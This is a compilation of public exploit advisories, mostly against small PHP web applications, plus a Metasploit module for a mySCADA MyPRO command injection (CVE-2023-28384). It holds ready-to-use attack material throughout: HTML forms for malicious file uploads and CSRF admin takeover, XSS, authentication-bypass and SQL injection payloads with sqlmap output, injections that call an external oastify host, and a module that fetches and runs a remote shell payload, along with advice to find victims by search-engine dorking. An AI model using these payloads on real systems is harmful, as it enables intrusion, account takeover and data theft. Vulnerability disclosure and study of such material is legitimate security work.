<pre><code>=============================================================================================================================================<br />| # Title : AccPack Buzz v1.0 Remote File Upload Vulnerability |<br />| # Author : indoushka |<br />| # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 125.0.1 (64 bits) |<br />| # Vendor : http://webpay.com.np/#Product |<br />=============================================================================================================================================<br /><br />poc :<br /><br />[+] Dorking İn Google Or Other Search Enggine.<br /><br />[+] The following html code uploads a executable malicious file remotely .<br /><br />[+] use payload : <br /><br /><html><br /><head><br /> <title>Add</title><br /></head><br /><body><br /> <div align="center"><br /><form action="http://127.0.0.1/jamiatulamanepalorgp/cms/gallery/insert.php" method="POST" enctype="multipart/form-data"><br /><table><br /> <tr><br /> <td>Image</td><td><br /> <input type="file" name="image-upload" id="image-upload"></td><br /> </tr><br /> <tr><br /> <td>Status</td><td><br /> <input type="radio" name="status" id="actiive" value="1" checked /> <label for="active">Active</label><br /> <input type="radio" name="status" id="passive" value="0" /><label for="passive">Passive</label><br /> </td><br /> </tr> <br /> <tr style='height:80'><br /> <td colspan="2"><input type='submit' value='Submit'><input type='reset' Value='Reset'></td><br /> </tr><br /></table><br /></form><br /></div><br /></body><br /></html><br /><br />[+] In the seventh line, we change the link to the target link.<br /><br />[+] Link to the uploaded files : cms/image/gallery/<br /><br />[+] The script renames the file to a number, and you always choose numbers starting from the number 9 and above.<br /><br />Greetings to :============================================================<br />jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * CraCkEr |<br />==========================================================================<br /></code></pre>
<pre><code>=============================================================================================================================================<br />| # Title : Academy LMS 6.8.1 XSS Vulnerability |<br />| # Author : indoushka |<br />| # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 128.0.3 (64 bits) |<br />| # Vendor : https://demo.creativeitem.com/academy/ |<br />=============================================================================================================================================<br /><br />poc :<br /><br />[+] Dorking İn Google Or Other Search Enggine.<br /><br />[+] use payload : /ebook?search=the%27%22()%26%25%3Cacx%3E%3CScRiPt%20%3Eprompt(965964)%3C/ScRiPt%3E<br /><br />[+] https://127.0.0.1/demo.creativeitem.com/academy/ebook?search=the%27%22()%26%25%3Cacx%3E%3CScRiPt%20%3Eprompt(965964)%3C/ScRiPt%3E<br /><br /><br />Greetings to :============================================================<br />jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * CraCkEr |<br />==========================================================================<br /></code></pre>
<pre><code>====================================================================================================================================<br />| # Title : Chuksrio LMS v2.9 IDOR Vulnerability |<br />| # Author : indoushka |<br />| # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 125.0.1 (64 bits) |<br />| # Vendor : https://www.sourcecodester.com/ |<br />====================================================================================================================================<br /><br />poc :<br /><br />[+] Dorking İn Google Or Other Search Enggine.<br /><br />[+] Insecure Direct Object Reference : suffers from an insecure direct object reference that allows users to access the administrative interface.<br /><br />[+] use payload : /admin/header.php?captcha<br /><br />[+] https://www/127.0.0.1/mefkayschools.org/admin/header.php?captcha<br /><br /><br />Greetings to :==================================================<br />jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R |<br />================================================================<br /></code></pre>
<pre><code>=============================================================================================================================================<br />| # Title : AMPLE BILLS v1.0 Administrative Page Disclosure Vulnerability |<br />| # Author : indoushka |<br />| # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 125.0.1 (64 bits) |<br />| # Vendor : https://www.sourcecodester.com/php/16741/free-and-open-source-inventory-management-system-php-source-code.html |<br />=============================================================================================================================================<br /><br />poc :<br /><br />[+] Dorking İn Google Or Other Search Enggine.<br /><br />[+] Vulnerability description :<br /><br /><br />An HTML form was found in the response body of this page. However, the current page redirects the visitor to another page by returning an HTTP status code of 301/302.<br /> Therefore, all browser users will not see the contents of this page and will not be able to interact with the HTML form. <br /><br />Sometimes programmers don't properly terminate the script after redirecting the user to another page. For example: <br /><?php<br /> if (!isset($_SESSION["authenticated"])) {<br /> header("Location: auth.php");<br /> }<br />?><br /><title>Administration page</title><br /><form action="/admin/action" method="post"><br /> <!-- ... form inputs ... --><br /></form><br /> <br /><!-- ... the rest of the administration page ... --><br />This script is incorrect because the script is not terminated after the "header("Location: auth.php");" line. An attacker can access the content the administration page by using an HTTP client that doesn't follow redirection (like HTTP Editor). This creates an authentication bypass vulnerability. <br />The correct code would be <br /><br /><?php<br /> if (!isset($_SESSION[auth])) {<br /> header("Location: auth.php");<br /> exit();<br /> }<br />?><br /><title>Administration page</title><br /><form action="/admin/action" method="post"><br /> <!-- ... form inputs ... --><br /></form><br /> <br /><!-- ... the rest of the administration page ... --><br /><br />[+] infected item : /pass. <br /><br />[+] Attack details :<br /><br />Form action=''<br /><br />Request<br />GET /ample/index.php?page=add_expense_catagory HTTP/1.1<br />Pragma: no-cache<br />Cache-Control: no-cache<br />Referer: http://127.0.0.1/ample/index.php<br />Acunetix-Aspect: enabled<br />Acunetix-Aspect-Password: 082119f75623eb7abd7bf357698ff66c<br />Acunetix-Aspect-Queries: filelist;aspectalerts<br />Cookie: PHPSESSID=d79a5fbv977hkq34ib65osmk8u<br />Host: 127.0.0.1<br />Connection: Keep-alive<br />Accept-Encoding: gzip,deflate<br />User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.21<br />Accept: */*<br /><br />Response<br />HTTP/1.1 302 Found<br />Date: Sun, 28 Jul 2024 22:44:51 GMT<br />Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.0.30<br />X-Powered-By: PHP/8.0.30<br />Expires: Thu, 19 Nov 1981 08:52:00 GMT<br />Cache-Control: no-store, no-cache, must-revalidate<br />Pragma: no-cache<br />location: login.php<br />Keep-Alive: timeout=5, max=78<br />Connection: Keep-Alive<br />Content-Type: text/html; charset=UTF-8<br />Content-Length: 31539<br /><br /><br />[+] The impact of this vulnerability : depends on the affected web application.<br /><br />[+] How to fix this vulnerability : Make sure the script is terminated after redirecting the user to another page<br /><br /><br />Greetings to :============================================================<br />jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * CraCkEr |<br />==========================================================================<br /></code></pre>
<pre><code>=============================================================================================================================================<br />| # Title : SchoolPlus v1.0 Remote File Upload Vulnerability |<br />| # Author : indoushka |<br />| # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 125.0.1 (64 bits) |<br />| # Vendor : http://webpay.com.np/#Product |<br />=============================================================================================================================================<br /><br />poc :<br /><br />[+] Dorking İn Google Or Other Search Enggine.<br /><br />[+] remote file upload : Uploaded malicious files can be run remotely<br /><br />[+] use payload : <br /><br /><html><br /><head><br /> <title>Add</title><br /></head><br /><body><br /> <div align="center"><br /><form action="http://127.0.0.1/jamiatulamanepalorgp/cms/gallery/insert.php" method="POST" enctype="multipart/form-data"><br /><table><br /> <tr><br /> <td>Image</td><td><br /> <input type="file" name="image-upload" id="image-upload"></td><br /> </tr><br /> <tr><br /> <td>Status</td><td><br /> <input type="radio" name="status" id="actiive" value="1" checked /> <label for="active">Active</label><br /> <input type="radio" name="status" id="passive" value="0" /><label for="passive">Passive</label><br /> </td><br /> </tr> <br /> <tr style='height:80'><br /> <td colspan="2"><input type='submit' value='Submit'><input type='reset' Value='Reset'></td><br /> </tr><br /></table><br /></form><br /></div><br /></body><br /></html><br /><br />[+] In the seventh line, we change the link to the target link.<br /><br />[+] Link to the uploaded files : cms/image/gallery/<br /><br />[+] The script renames the file to a number, and you always choose numbers starting from the number 9 and above.<br /><br />Greetings to :============================================================<br />jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * CraCkEr |<br />==========================================================================<br /></code></pre>
<pre><code>=============================================================================================================================================<br />| # Title : AccPack Khanepani v1.0 Auth By Pass Vulnerability |<br />| # Author : indoushka |<br />| # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 125.0.1 (64 bits) |<br />| # Vendor : http://webpay.com.np/#Product |<br />=============================================================================================================================================<br /><br />poc :<br /><br />[+] Dorking İn Google Or Other Search Enggine.<br /><br />[+] use payload : user & pass = ' or 0=0 ##<br /><br />[+] Panel : http://127.0.0.1/jamiatulamanepal.orgnp/cms/<br /><br />Greetings to :============================================================<br />jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * CraCkEr |<br />==========================================================================<br /></code></pre>
<pre><code>=============================================================================================================================================<br />| # Title : AccPack Cop CMS v1.0 SQL injection Vulnerability |<br />| # Author : indoushka |<br />| # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 125.0.1 (64 bits) |<br />| # Vendor : http://webpay.com.np/#Product |<br />=============================================================================================================================================<br /><br />poc :<br /><br />[+] Dorking İn Google Or Other Search Enggine.<br /><br />[+] use payload : index.php?project_type_id=1<br /><br />[+] https://www/127.0.0.1/demo/bccn.orgnp/projects/index.php?project_type_id=1 <=== inject here<br /><br />[+] E:\sqlmap>python sqlmap.py -u https://www.bccnorgnp/projects/index.php?project_type_id=1 --risk=3 --level=5 --random-agent --user-agent -v3 --batch --threads=10 --dbs<br /><br />[+] Parameter: project_type_id (GET)<br /> Type: boolean-based blind<br /> Title: AND boolean-based blind - WHERE or HAVING clause<br /> Payload: project_type_id=1 AND 5604=5604<br /><br /> Type: stacked queries<br /> Title: MySQL < 5.0.12 stacked queries (BENCHMARK - comment)<br /> Payload: project_type_id=1;SELECT BENCHMARK(5000000,MD5(0x45507849))#<br /><br /> Type: time-based blind<br /> Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)<br /> Payload: project_type_id=1 AND (SELECT 5053 FROM (SELECT(SLEEP(5)))tLpS)<br /><br /> Type: UNION query<br /> Title: Generic UNION query (NULL) - 2 columns<br /> Payload: project_type_id=-7152 UNION ALL SELECT NULL,CONCAT(0x717a766271,0x6e496a5078736e466d5662454c5a6a73517278504b4d786866495454786d56417073505956586b70,0x71716a6a71)-- -<br />---<br /><br />Greetings to :============================================================<br />jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * CraCkEr |<br />==========================================================================<br /></code></pre>
<pre><code>=============================================================================================================================================<br />| # Title : AccPack Buzz Cop v1.0 CSRF Vulnerability |<br />| # Author : indoushka |<br />| # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 125.0.1 (64 bits) |<br />| # Vendor : http://webpay.com.np/#Product |<br />=============================================================================================================================================<br /><br />poc :<br /><br />[+] Dorking İn Google Or Other Search Enggine.<br /><br />[+] The following HTML code modifies the admin information.<br /><br />[+] Go to the line 5. Set the target site link Save changes and apply . <br /><br />[+] infected file : cms/user/modify.php.<br /><br />[+] http://127.0.0.1/q7.3/cms/user/modify.php.<br /><br />[+] save code as poc.html <br /><br />[+] payload : <br /><br /></head><br /><body><br /> <div class="container"><br /> <div class="text-center" style="padding: 5px"><h3>User Edit</h3></div><br /> <form action="https://tssclahanorgnp/cms/user/modify.php" method="POST" enctype="multipart/form-data"><br /> <div hidden="true"><br /> <input type="text" name="id" id="id" value="1"><br /> </div><br /> <div><br /> <label for='email'>Email</label><input type="text" class="form-control" name='email' id='email' value="indoushka@mail.dz"><br /> </div><br /> <div><br /> <label for='password'>Password</label><input type="text" class="form-control" name='password' id='password' type='password' value="123456"><br /> </div><br /> <tr><br /> <div><br /> <label for='status'>Status</label><br /> <input type="radio" name="status" id="actiive" value="1" checked /> <label for="active">Active</label><br /> <input type="radio" name="status" id="passive" value="0" /><label for="passive">Passive</label><br /> <br /> </div> <br /> <div style='height:80'><br /> <input type='submit' value='Submit'><input type='reset' Value='Reset'><br /> </div><br /> </form><br /> </div><br /><br /></body><br /></html><br /><br />Greetings to :============================================================<br />jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * CraCkEr |<br />==========================================================================<br /></code></pre>
<pre><code>class MetasploitModule < Msf::Exploit::Remote<br /> Rank = ExcellentRanking<br /> include Msf::Exploit::Remote::HttpClient<br /> prepend Msf::Exploit::Remote::AutoCheck<br /><br /> def initialize(info = {})<br /> super(<br /> update_info(<br /> info,<br /> 'Name' => 'mySCADA MyPRO Authenticated Command Injection (CVE-2023-28384)',<br /> 'Description' => %q{<br /> Authenticated Command Injection in MyPRO <= v8.28.0 from mySCADA.<br /> The vulnerability can be exploited by a remote attacker to inject arbitrary operating system commands which will get executed in the context of NT AUTHORITY\SYSTEM.<br /> },<br /> 'License' => MSF_LICENSE,<br /> 'Author' => ['Michael Heinzl'], # Vulnerability discovery & MSF module<br /> 'References' => [<br /> [ 'URL', 'https://www.cisa.gov/news-events/ics-advisories/icsa-23-096-06'],<br /> [ 'CVE', '2023-28384']<br /> ],<br /> 'DisclosureDate' => '2022-09-22',<br /> 'Platform' => 'win',<br /> 'Arch' => [ ARCH_CMD ],<br /> 'Targets' => [<br /> [<br /> 'Windows_Fetch',<br /> {<br /> 'Arch' => [ ARCH_CMD ],<br /> 'Platform' => 'win',<br /> 'DefaultOptions' => { 'FETCH_COMMAND' => 'CURL' },<br /> 'Type' => :win_fetch<br /> }<br /> ]<br /> ],<br /> 'DefaultTarget' => 0,<br /><br /> 'Notes' => {<br /> 'Stability' => [CRASH_SAFE],<br /> 'Reliability' => [REPEATABLE_SESSION],<br /> 'SideEffects' => [IOC_IN_LOGS]<br /> }<br /> )<br /> )<br /><br /> register_options(<br /> [<br /> OptString.new(<br /> 'USERNAME',<br /> [ true, 'The username to authenticate with (default: admin)', 'admin' ]<br /> ),<br /> OptString.new(<br /> 'PASSWORD',<br /> [ true, 'The password to authenticate with (default: admin)', 'admin' ]<br /> ),<br /> OptString.new(<br /> 'TARGETURI',<br /> [ true, 'The URI for the MyPRO web interface', '/' ]<br /> )<br /> ]<br /> )<br /> end<br /><br /> # Determine if the MyPRO instance runs a vulnerable version<br /> def check<br /> begin<br /> res = send_request_cgi({<br /> 'method' => 'POST',<br /> 'uri' => normalize_uri(target_uri.path, 'l.fcgi'),<br /> 'vars_post' => {<br /> 't' => '98'<br /> }<br /> })<br /> rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout, ::Rex::ConnectionError<br /> return CheckCode::Unknown<br /> end<br /><br /> if res && res.code == 200<br /> data = res.get_json_document<br /> version = data['V']<br /> if version.nil?<br /> return CheckCode::Unknown<br /> else<br /> vprint_status('Version retrieved: ' + version)<br /> end<br /><br /> if Rex::Version.new(version) <= Rex::Version.new('8.28')<br /> return CheckCode::Appears<br /> else<br /> return CheckCode::Safe<br /> end<br /> else<br /> return CheckCode::Unknown<br /> end<br /> end<br /><br /> def exploit<br /> execute_command(payload.encoded)<br /> end<br /><br /> def execute_command(cmd)<br /> print_status('Checking credentials...')<br /> check_auth<br /> print_status('Sending command injection...')<br /> exec_mypro(cmd)<br /> print_status('Exploit finished, check thy shell.')<br /> end<br /><br /> # Check if credentials are working<br /> def check_auth<br /> res = send_request_cgi({<br /> 'method' => 'GET',<br /> 'uri' => normalize_uri(target_uri.path, 'sss2'),<br /> 'headers' => {<br /> 'Authorization' => basic_auth(datastore['USERNAME'], datastore['PASSWORD'])<br /> }<br /> })<br /><br /> unless res<br /> fail_with(Failure::Unreachable, 'Failed to receive a reply from the server.')<br /> end<br /> case res.code<br /> when 200<br /> print_good('Credentials are working.')<br /> when 401<br /> fail_with(Failure::NoAccess, 'Unauthorized access. Are your credentials correct?')<br /> else<br /> fail_with(Failure::UnexpectedReply, 'Unexpected reply from the target.')<br /> end<br /> end<br /><br /> # Send command injection<br /> def exec_mypro(cmd)<br /> post_data = {<br /> 'type' => 'sendEmail',<br /> 'addr' => "#{Rex::Text.rand_text_alphanumeric(3..12)}@#{Rex::Text.rand_text_alphanumeric(4..8)}.com\"&&#{cmd}"<br /> }<br /> post_json = JSON.generate(post_data)<br /><br /> res = send_request_cgi({<br /> 'method' => 'POST',<br /> 'ctype' => 'application/json',<br /> 'data' => post_json,<br /> 'uri' => normalize_uri(target_uri.path, 'sss2'),<br /> 'headers' => {<br /> 'Authorization' => basic_auth(datastore['USERNAME'], datastore['PASSWORD'])<br /> }<br /><br /> })<br /><br /> # We don't fail if no response is received, as the server will wait until the injected command got executed before returning a response. Typically, this will simply result in a 504 Gateway Time-out error after some time, but there is no indication on whether the injected payload got successfully executed or not from the server response.<br /><br /> if res && res.code == 200 # If the injected command executed and terminated within the timeout, a HTTP status code of 200 is returned.<br /> print_good('Command successfully executed, check your shell.')<br /> end<br /> end<br /><br />end<br /></code></pre>
<pre><code>## Titles: blog-site-1.0 Multiple-SQLi<br />## Author: nu11secur1ty<br />## Date: 07/29/2024<br />## Vendor: https://github.com/oretnom23<br />## Software:<br />https://www.sourcecodester.com/php/14442/blog-site-using-phpmysql.html<br />## Reference: https://portswigger.net/web-security/sql-injection<br /><br />## Description:<br />The id parameter appears to be vulnerable to SQL injection attacks. The<br />payload '+(select load_file('\\\\<br />turga9kvxwd8g46kuiim9id0srykmaa1dp4cv0k.oastify.com\\ywy'))+' was submitted<br />in the id parameter. This payload injects a SQL sub-query that calls<br />MySQL's load_file function with a UNC file path that references a URL on an<br />external domain. The application interacted with that domain, indicating<br />that the injected SQL query was executed.The attacker can get all<br />information from the system by using this vulnerability!<br /><br />STATUS: HIGH- Vulnerability<br /><br /><br />[+]Exploits:<br />- SQLi Multiple:<br />```mysql<br />---<br />Parameter: id (GET)<br /> Type: boolean-based blind<br /> Title: OR boolean-based blind - WHERE or HAVING clause<br /> Payload: page=category&id=-7721' OR 5223=5223 AND 'yTLh'='yTLh<br /><br /> Type: error-based<br /> Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP<br />BY clause (FLOOR)<br /> Payload: page=category&id=3'+(select load_file('\\\\<br />turga9kvxwd8g46kuiim9id0srykmaa1dp4cv0k.oastify.com\\ywy'))+'' AND (SELECT<br />2233 FROM(SELECT COUNT(*),CONCAT(0x7171717671,(SELECT<br />(ELT(2233=2233,1))),0x716b626a71,FLOOR(RAND(0)*2))x FROM<br />INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) AND 'Mgsn'='Mgsn<br /><br /> Type: time-based blind<br /> Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)<br /> Payload: page=category&id=3'+(select load_file('\\\\<br />turga9kvxwd8g46kuiim9id0srykmaa1dp4cv0k.oastify.com\\ywy'))+'' AND (SELECT<br />5859 FROM (SELECT(SLEEP(7)))tvNV) AND 'ocCx'='ocCx<br /><br /> Type: UNION query<br /> Title: MySQL UNION query (NULL) - 9 columns<br /> Payload: page=category&id=3'+(select load_file('\\\\<br />turga9kvxwd8g46kuiim9id0srykmaa1dp4cv0k.oastify.com\\ywy'))+'' UNION ALL<br />SELECT<br />CONCAT(0x7171717671,0x416d7442627944704b55554267774f596d766967615341654a4242745a45467a71494f73596f776b,0x716b626a71),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL#<br />---<br />```<br /><br />## Reproduce:<br />[href](https://www.patreon.com/posts/blog-site-1-0-108994688)<br /><br />## Proof and Exploit:<br />[href](https://www.nu11secur1ty.com/2024/07/blog-site-10-multiple-sqli.html)<br /><br />## Time spent:<br />00:37:00<br /><br /><br /></code></pre>